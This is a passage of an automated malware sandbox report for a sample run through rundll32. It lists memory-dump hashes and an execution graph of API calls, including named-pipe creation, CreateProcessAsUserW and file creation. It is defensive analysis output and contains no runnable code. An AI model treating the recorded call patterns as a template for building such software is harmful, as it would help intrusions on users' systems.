                                                                                    • Opcode Fuzzy Hash: 091658dd66813f0f9b644795ec6175f47c96ef7b8fd89259e5aedc05193d25e3
                                                                                    • Instruction Fuzzy Hash: 67114F31B40104AFDB84EF64D851AAD7BB6EF8C311F148429D419A7380CF79AC8BCBA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b6d31bf094c115fb361806017468f8fb8df3fc4899585e72df3edd8ebeb1980d
                                                                                    • Instruction ID: feb8ae211520a284036ec3c5c32e3b29d62baf52922c75f4703fc079c688155a
                                                                                    • Opcode Fuzzy Hash: b6d31bf094c115fb361806017468f8fb8df3fc4899585e72df3edd8ebeb1980d
                                                                                    • Instruction Fuzzy Hash: 0D2115B1D042498EDB20DFAAC884AEEFBB0FF48324F10852DD459A7240C7745945CFA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 59d87fca7b9e3ef79bf342c631be662204e6d856ae30eb1a8379327f2f06bea4
                                                                                    • Instruction ID: 03f084fd23adc05b3fe347c23432c7a43a58a672ae61db85fa4bf0794c8bd504
                                                                                    • Opcode Fuzzy Hash: 59d87fca7b9e3ef79bf342c631be662204e6d856ae30eb1a8379327f2f06bea4
                                                                                    • Instruction Fuzzy Hash: F101A532F001188BDF54AAA8D8102EEB7F6EFCC315F04407AC605B7254DB359A46C7E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 41a8a0740f1cb9ffc20f4c4ff849cff6597e36edc0bff630dd6c09fafa1ad712
                                                                                    • Instruction ID: b721941c75987f30dff2393c3d4df54452e12aa9cf95d87c92b66605d06fbd57
                                                                                    • Opcode Fuzzy Hash: 41a8a0740f1cb9ffc20f4c4ff849cff6597e36edc0bff630dd6c09fafa1ad712
                                                                                    • Instruction Fuzzy Hash: D10184363111109F8748D66EF89196EB7AAFBC8260314803BFA05C7310CE32EC03D794
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 92d412709aeac9dc49405b74b4d98dd500aea0340f247ee6fc9541d245760456
                                                                                    • Instruction ID: 95e186d178851b327f89f68509356c358d9f73727374852a74ece201b4b6a0e8
                                                                                    • Opcode Fuzzy Hash: 92d412709aeac9dc49405b74b4d98dd500aea0340f247ee6fc9541d245760456
                                                                                    • Instruction Fuzzy Hash: 401106B1D042498FDB20DFAAC884AEEFBF4FF48324F108429D45967250CB746945CFA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 957c2796eede30e883a033cf9c9fafa21c302da8e94084fbe6f41625a9f6f206
                                                                                    • Instruction ID: 87eb8b95824ab9a0e3e71d0ad742dcffcaa9d56152e14b3c29c3b12a0f81b67e
                                                                                    • Opcode Fuzzy Hash: 957c2796eede30e883a033cf9c9fafa21c302da8e94084fbe6f41625a9f6f206
                                                                                    • Instruction Fuzzy Hash: 4101D830F5A3452FDB099F785D3512A3FE9DE8660830508AAD549CF161E914C84BC7D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 665bd5e19335821005633766c580dfacbc74a14f730d133a4e0c936c613c0c20
                                                                                    • Instruction ID: 18b017e8606fdcbda76949140fe38b02956663cf9b5fe09de04b75dfa2273342
                                                                                    • Opcode Fuzzy Hash: 665bd5e19335821005633766c580dfacbc74a14f730d133a4e0c936c613c0c20
                                                                                    • Instruction Fuzzy Hash: 3A11CB35A00115AFDB04DFA4D859AAD7BB6EF9C311F148019E50AA7390CF799C87CFA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9bcc857ee2a7439135bb54e467e190763f353188108ac8691a97cdb8229e1996
                                                                                    • Instruction ID: 3517b6da2c2d15b9be931517f706b3816db347028df3a94c36e220affca75a34
                                                                                    • Opcode Fuzzy Hash: 9bcc857ee2a7439135bb54e467e190763f353188108ac8691a97cdb8229e1996
                                                                                    • Instruction Fuzzy Hash: 7A018B35A04108ABEB64FAA89A557AF7AABDBC8304F14402DE511A7380CE755C0497F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9b2d33afeb7fa67a00a9ea64deeacfa18c16010d4947bcda7a013eea5acb488a
                                                                                    • Instruction ID: 39b3561fc1cc8b5218e777eea1d2d63a2d81cd2604fa1112067a901a3404da83
                                                                                    • Opcode Fuzzy Hash: 9b2d33afeb7fa67a00a9ea64deeacfa18c16010d4947bcda7a013eea5acb488a
                                                                                    • Instruction Fuzzy Hash: 07017135B001148BDF58AAA489106EEBBF6AFCC315F048079C145B7254DA359A41CBE1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c0e52da48adf7245081f0b2ff01591ec2eda4646bf7fb1a611927c7f3d1e29fa
                                                                                    • Instruction ID: bd3b3b014ab64ae5bd849a21eb19168b7adadd43267c57aff2e8808bbdecfd59
                                                                                    • Opcode Fuzzy Hash: c0e52da48adf7245081f0b2ff01591ec2eda4646bf7fb1a611927c7f3d1e29fa
                                                                                    • Instruction Fuzzy Hash: C1F0AC32F042A04BEBD47BF45C113BE6792DBC0704F46856AE2599B6D0EA26D443C3D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6368618d6e3d5047a4760f457a07858d77c1505674fd052222db69488545a5c4
                                                                                    • Instruction ID: 5226d857385d379d189e57e3fef07bb5009b0d6de96ec7fcc71258e3c28aeced
                                                                                    • Opcode Fuzzy Hash: 6368618d6e3d5047a4760f457a07858d77c1505674fd052222db69488545a5c4
                                                                                    • Instruction Fuzzy Hash: 99018F31B002549BEB98BB6AC854BAF7AE69FC8344F20842DD506A7390CE759D05CBD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1716074032.00000000045FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_45fd000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 766a1a8cb81d7f4cba253d5178131aced4104873646f7f5c629bca9ab8440f27
                                                                                    • Instruction ID: 065ddf88cdacaba465570a105d44fb3867c529185ac183831d26379f60b9a03d
                                                                                    • Opcode Fuzzy Hash: 766a1a8cb81d7f4cba253d5178131aced4104873646f7f5c629bca9ab8440f27
                                                                                    • Instruction Fuzzy Hash: 9301207110830099E7104E25EDC4767BFACFF41324F18C526DE090B146E679E449D6B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1716074032.00000000045FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_45fd000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e31533c81a5c14e71a60f5a31a6ceaea6efd5ae33b67ee6bce8d7c9f043cb318
                                                                                    • Instruction ID: 4dcfac2904c683689f1e3b5e943117709007d01319d3ac25ff7b0e47e3fdaa79
                                                                                    • Opcode Fuzzy Hash: e31533c81a5c14e71a60f5a31a6ceaea6efd5ae33b67ee6bce8d7c9f043cb318
                                                                                    • Instruction Fuzzy Hash: FB01406110D3C05ED7124B259C94756BFB8EF53224F1984DBD9888F193D2699849C772
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0921c6cd940794c2717d75cc52d558db55b5f9faf2b0b29d9953c40ef9f3df3b
                                                                                    • Instruction ID: 570094f48153ee85bbc4c6657d3d061ec411ef76de3564d99ab49c221b20ff02
                                                                                    • Opcode Fuzzy Hash: 0921c6cd940794c2717d75cc52d558db55b5f9faf2b0b29d9953c40ef9f3df3b
                                                                                    • Instruction Fuzzy Hash: 3001DF31B001548BEB98BB698954BAF7AF39FC8304F24802DD106AB390CE709D05CBD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2e4a6ca4e9fd38ed10944b693595a1854da071245c39736962942ce9311adfac
                                                                                    • Instruction ID: c375ad09d1f9950e1a8ebc591a98ae334be7fb8bd28c5feddd4947e7092dab0e
                                                                                    • Opcode Fuzzy Hash: 2e4a6ca4e9fd38ed10944b693595a1854da071245c39736962942ce9311adfac
                                                                                    • Instruction Fuzzy Hash: CBF0C230F412465FDB1DDF74592512A3FE6EAC570C30508AEC1458F161E924C84BCBD2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f293c2e97e81470ec5f9cc4037d080cb48a8df22b7bec6fb56e14affc8623bfa
                                                                                    • Instruction ID: 5a09045fef975a2683091d44c5e6ec0994ad3e4f3c6afb94857d02cad46c0c32
                                                                                    • Opcode Fuzzy Hash: f293c2e97e81470ec5f9cc4037d080cb48a8df22b7bec6fb56e14affc8623bfa
                                                                                    • Instruction Fuzzy Hash: 35F082313013004B8722A66FE8529AFBBDAEBC46A0300802AE90AC7714DEA1DC0947D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 92858b09b941b723bd227a7f8c79005c53c636a39e88a29ab8284fc5991600f9
                                                                                    • Instruction ID: 4590410f6215d5c6b3abb45451a3a10ded631ee1fd70264698a450f940dc8005
                                                                                    • Opcode Fuzzy Hash: 92858b09b941b723bd227a7f8c79005c53c636a39e88a29ab8284fc5991600f9
                                                                                    • Instruction Fuzzy Hash: CFF0A021A246540AEBA932B55C003B66F9D4B52714F0008F6E685C7793D5E4DE0753F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ecfd070676c4e45af2d7e6d853510a372a53c034e76177a46bb878f5345cda5
                                                                                    • Instruction ID: d4cd801f4f0435c42ebb412fac2f936ef0fc3661123b7ea0827ef2f4193895fa
                                                                                    • Opcode Fuzzy Hash: 6ecfd070676c4e45af2d7e6d853510a372a53c034e76177a46bb878f5345cda5
                                                                                    • Instruction Fuzzy Hash: 33E086327142055BE314996EE85196BF79AFBC9628B10447DE50CC7355CD72AC438690
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ca533c0464d92da3d881721640f6f970f7f224c6d76f1dd343b4276f784f1cf8
                                                                                    • Instruction ID: 33d42fd205dc81e2319cfeb9e3f951a99bb32df71bf1c23071af47b044e8879f
                                                                                    • Opcode Fuzzy Hash: ca533c0464d92da3d881721640f6f970f7f224c6d76f1dd343b4276f784f1cf8
                                                                                    • Instruction Fuzzy Hash: 13E04830906348DFC741DFB4DD025AD7BF9DF4124071141E6D509E7351D9315F069791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a1d95a9f5f19ecaf0b38c54b666b1953857f5aa0989f10f413abfd3ce578c1ec
                                                                                    • Instruction ID: 5bc2ebefc819ea33434757693a449db47a0724e765af628b9b4507b0a729f548
                                                                                    • Opcode Fuzzy Hash: a1d95a9f5f19ecaf0b38c54b666b1953857f5aa0989f10f413abfd3ce578c1ec
                                                                                    • Instruction Fuzzy Hash: A5E08632B41118BBD7957B95A804BAB7E49DB55360F508021E91C46150CA354891D6A4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b4e4ad6fb83d91402722befef571aaba1dc3d12ade8aab793bd44e4543458944
                                                                                    • Instruction ID: a4875a2df92100bc2f819798f6a322eda88c92cabbb85ca944396c84f576a83f
                                                                                    • Opcode Fuzzy Hash: b4e4ad6fb83d91402722befef571aaba1dc3d12ade8aab793bd44e4543458944
                                                                                    • Instruction Fuzzy Hash: 18E0C225E093519EC741237025142EABF79CB91301F0599E2EA58DE206C8388C0283E0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 97c2846ddfefec6acfe0af12c88ff1748b38b6498fcdb238d127104ac7b28a28
                                                                                    • Instruction ID: 4ba9d703ff5796b8f5985774a82d279e384c947bead90a816cc7adcd6b8dc0ae
                                                                                    • Opcode Fuzzy Hash: 97c2846ddfefec6acfe0af12c88ff1748b38b6498fcdb238d127104ac7b28a28
                                                                                    • Instruction Fuzzy Hash: DCE02B3B20C1948FC3062F28A8560A57FB1EB4F21030900A7F4C0CB261CD710D11C7A0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9ca748bac1fc14d95bbe8e7fb1326c2eac6b2e406371883654bfc8bce76dbc83
                                                                                    • Instruction ID: 5e42cf6dbe2034cc9b8039ec5397a06dbbdaeb7bea9ece65ab9fc28e885f18b5
                                                                                    • Opcode Fuzzy Hash: 9ca748bac1fc14d95bbe8e7fb1326c2eac6b2e406371883654bfc8bce76dbc83
                                                                                    • Instruction Fuzzy Hash: 84D0A7326500187B5644B65CEC8787ABBA9EB893A07108433F902C3264CD60EC4187E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a67a2e9e65feb8407308bc891b2cdb466ca0c9087f50cd8e627227fbbf95b76c
                                                                                    • Instruction ID: e61a3f2cd7280cf89c5ab1389a1f59eb4997e06b9e509a2a9f11acf90bee89f9
                                                                                    • Opcode Fuzzy Hash: a67a2e9e65feb8407308bc891b2cdb466ca0c9087f50cd8e627227fbbf95b76c
                                                                                    • Instruction Fuzzy Hash: A4D05B7091120DEFCB40EFB8E90255DBBF9EB44244B1045B9D909D3310DE316F059781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b5f0e29444335e9cb8b5ad20d984e77b901137409c19cde8d2efe9146359509c
                                                                                    • Instruction ID: dce6687a329abbe28682cd04ac86f24a59244df7a9e34ae9045d14c333d564e3
                                                                                    • Opcode Fuzzy Hash: b5f0e29444335e9cb8b5ad20d984e77b901137409c19cde8d2efe9146359509c
                                                                                    • Instruction Fuzzy Hash: F0D0127090120CEFCF40DFA8D94259EB7F9EB84204B1055A9D909E7610DE316F409B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1715157287.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_6dd0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4dc1c942794e4d730e80b0cc43f3d8b1d4b61ee6740614fac9fd4256121b0b35
                                                                                    • Instruction ID: 3c7052c35b12a465a179ab61bfa0929ba81dd80fa9612a098c3792c022b7a60b
                                                                                    • Opcode Fuzzy Hash: 4dc1c942794e4d730e80b0cc43f3d8b1d4b61ee6740614fac9fd4256121b0b35
                                                                                    • Instruction Fuzzy Hash: AFD0127180D7D45FD3128A580C84895AF20E97720478D8396D08099453A2594A67C3E1

                                                                                    Execution Graph

                                                                                    Execution Coverage:12.7%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:4.2%
                                                                                    Total number of Nodes:354
                                                                                    Total number of Limit Nodes:27
                                                                                    execution_graph 37649 3c04cc0 37650 3c04cdc 37649->37650 37651 3c04cfa 37649->37651 37650->37651 37653 3c055c9 37650->37653 37654 3c055f7 37653->37654 37655 3c058ab 37654->37655 37658 3c07210 37654->37658 37662 3c0720c 37654->37662 37660 3c07238 37658->37660 37659 3c072c7 37659->37655 37660->37659 37666 137fab8 37660->37666 37664 3c07238 37662->37664 37663 3c072c7 37663->37655 37664->37663 37665 137fab8 2 API calls 37664->37665 37665->37664 37667 137fadb 37666->37667 37668 137faeb 37666->37668 37672 137f930 2 API calls 37667->37672 37673 137fab8 2 API calls 37667->37673 37675 137fae4 37667->37675 37671 137fab8 2 API calls 37668->37671 37682 137f930 37668->37682 37669 137fb2c 37669->37675 37697 53577c0 37669->37697 37701 5357720 37669->37701 37708 53576e2 37669->37708 37713 3c00040 37669->37713 37718 5357730 37669->37718 37722 5357770 37669->37722 37726 3c00007 37669->37726 37671->37669 37672->37669 37673->37669 37675->37660 37683 137f963 37682->37683 37685 137f953 37682->37685 37683->37685 37693 137f930 2 API calls 37683->37693 37694 137fab8 2 API calls 37683->37694 37731 137a4c8 37683->37731 37736 137a4b8 37683->37736 37741 3c048b0 37683->37741 37747 3c048a0 37683->37747 37684 137f95c 37684->37669 37685->37684 37686 3c048a0 2 API calls 37685->37686 37687 3c048b0 2 API calls 37685->37687 37690 137fab8 2 API calls 37685->37690 37753 5357698 37685->37753 37759 5356e90 37685->37759 37686->37685 37687->37685 37690->37685 37693->37685 37694->37685 37698 53577d2 37697->37698 37699 5357808 37698->37699 37700 5357720 2 API calls 37698->37700 37699->37675 37700->37699 37702 5357723 37701->37702 37703 5357766 37701->37703 37704 5357744 37702->37704 37706 1376f00 2 API calls 37702->37706 37707 1376f69 2 API calls 37702->37707 37703->37704 37705 5357720 2 API calls 37703->37705 37704->37675 37705->37704 37706->37704 37707->37704 37709 53576eb 37708->37709 37709->37675 37710 5357744 37709->37710 37711 1376f00 2 API calls 37709->37711 37712 1376f69 2 API calls 37709->37712 37710->37675 37711->37710 37712->37710 37714 3c0005f 37713->37714 37716 3c00510 2 API calls 37714->37716 37823 3c00502 37714->37823 37715 3c000d1 37715->37675 37716->37715 37720 1376f00 2 API calls 37718->37720 37721 1376f69 2 API calls 37718->37721 37719 5357744 37719->37675 37720->37719 37721->37719 37723 53577d2 37722->37723 37724 5357808 37723->37724 37725 5357720 2 API calls 37723->37725 37724->37675 37725->37724 37727 3c0005f 37726->37727 37729 3c00510 2 API calls 37727->37729 37730 3c00502 2 API calls 37727->37730 37728 3c000d1 37728->37675 37729->37728 37730->37728 37732 137a4f9 37731->37732 37733 137a4ed 37731->37733 37732->37733 37734 3c048a0 2 API calls 37732->37734 37735 3c048b0 2 API calls 37732->37735 37733->37685 37734->37733 37735->37733 37737 137a4f9 37736->37737 37738 137a4ed 37736->37738 37737->37738 37739 3c048a0 2 API calls 37737->37739 37740 3c048b0 2 API calls 37737->37740 37738->37685 37739->37738 37740->37738 37743 3c048e4 37741->37743 37744 3c048d4 37741->37744 37742 3c048dd 37742->37685 37746 137f930 2 API calls 37743->37746 37744->37742 37765 3c066f0 37744->37765 37746->37744 37749 3c048d4 37747->37749 37750 3c048e4 37747->37750 37748 3c048dd 37748->37685 37749->37748 37751 3c066f0 2 API calls 37749->37751 37752 137f930 2 API calls 37750->37752 37751->37748 37752->37749 37754 53576e6 37753->37754 37755 53576a3 37753->37755 37754->37685 37804 1376f00 37755->37804 37810 1376f69 37755->37810 37756 53576c4 37756->37685 37760 5356e4a 37759->37760 37760->37759 37761 5356f22 37760->37761 37763 1376f00 2 API calls 37760->37763 37764 1376f69 2 API calls 37760->37764 37761->37685 37762 53576c4 37762->37685 37763->37762 37764->37762 37766 3c06730 37765->37766 37769 3c00510 37766->37769 37768 3c0674b 37768->37742 37770 3c00536 37769->37770 37773 53510d7 37769->37773 37777 53510d8 37769->37777 37770->37768 37774 53510ea 37773->37774 37775 535110d 37774->37775 37781 5351127 37774->37781 37775->37770 37778 53510ea 37777->37778 37779 535110d 37778->37779 37780 5351127 2 API calls 37778->37780 37779->37770 37780->37779 37782 5351140 37781->37782 37786 5351339 37782->37786 37795 5351348 37782->37795 37783 5351180 37783->37775 37787 535136f 37786->37787 37788 535145a CreateNamedPipeW 37787->37788 37789 53513f0 37787->37789 37792 5351521 37788->37792 37793 5351339 CreateNamedPipeW 37789->37793 37794 5351348 CreateNamedPipeW 37789->37794 37790 5351450 37790->37783 37792->37783 37793->37790 37794->37790 37796 535136f 37795->37796 37797 53513f0 37796->37797 37798 535145a CreateNamedPipeW 37796->37798 37802 5351339 CreateNamedPipeW 37797->37802 37803 5351348 CreateNamedPipeW 37797->37803 37801 5351521 37798->37801 37799 5351450 37799->37783 37801->37783 37802->37799 37803->37799 37805 1376f0f 37804->37805 37806 1376f17 37804->37806 37805->37756 37815 1377481 37806->37815 37819 1377490 37806->37819 37807 1376ff5 37807->37756 37811 1376f9c 37810->37811 37813 1377481 2 API calls 37811->37813 37814 1377490 2 API calls 37811->37814 37812 1376ff5 37812->37756 37813->37812 37814->37812 37816 13774ba 37815->37816 37817 13774d5 37816->37817 37818 137f930 2 API calls 37816->37818 37817->37807 37818->37817 37820 13774ba 37819->37820 37821 13774d5 37820->37821 37822 137f930 2 API calls 37820->37822 37821->37807 37822->37821 37824 3c00536 37823->37824 37825 53510d7 2 API calls 37823->37825 37826 53510d8 2 API calls 37823->37826 37824->37715 37825->37824 37826->37824 37827 5356130 37828 5356142 37827->37828 37831 5356620 37828->37831 37832 5356655 37831->37832 37835 5356736 37832->37835 37839 53567d0 37835->37839 37844 5356800 37835->37844 37836 53566a3 37840 535680d 37839->37840 37842 1377481 2 API calls 37840->37842 37843 1377490 2 API calls 37840->37843 37841 5356904 37841->37836 37842->37841 37843->37841 37845 535680d 37844->37845 37847 1377481 2 API calls 37845->37847 37848 1377490 2 API calls 37845->37848 37846 5356904 37846->37836 37847->37846 37848->37846 37997 5350270 37998 53502c3 CreateProcessAsUserW 37997->37998 38000 5350354 37998->38000 38001 53520f0 38002 535210e 38001->38002 38004 5352127 38002->38004 38007 5352240 38002->38007 38006 5352240 CreateFileA 38006->38004 38008 535225d 38007->38008 38012 5355f10 38008->38012 38016 5355f0c 38008->38016 38013 5355f23 38012->38013 38020 53554a4 38013->38020 38017 5355f23 38016->38017 38018 53554a4 CreateFileA 38017->38018 38019 5352150 38018->38019 38019->38006 38022 5355f60 CreateFileA 38020->38022 38023 5356095 38022->38023 38024 5351ed0 38025 5351f24 ConnectNamedPipe 38024->38025 38026 5351f60 38025->38026 37849 13736b0 37854 13736c6 37849->37854 37850 1373764 37851 1373739 37853 13736f9 37853->37850 37861 137e5dc 37853->37861 37854->37850 37854->37853 37856 137a6b0 37854->37856 37857 137a6ef 37856->37857 37868 137b987 37857->37868 37872 137b998 37857->37872 37858 137a756 37858->37853 37862 137e614 37861->37862 37865 137e7e6 37861->37865 37863 137e62e 37862->37863 37882 137ea99 37862->37882 37886 137eaa8 37862->37886 37864 137b398 2 API calls 37863->37864 37863->37865 37864->37865 37865->37851 37869 137b9ac 37868->37869 37876 137b398 37869->37876 37871 137b9c5 37871->37858 37873 137b9ac 37872->37873 37874 137b398 2 API calls 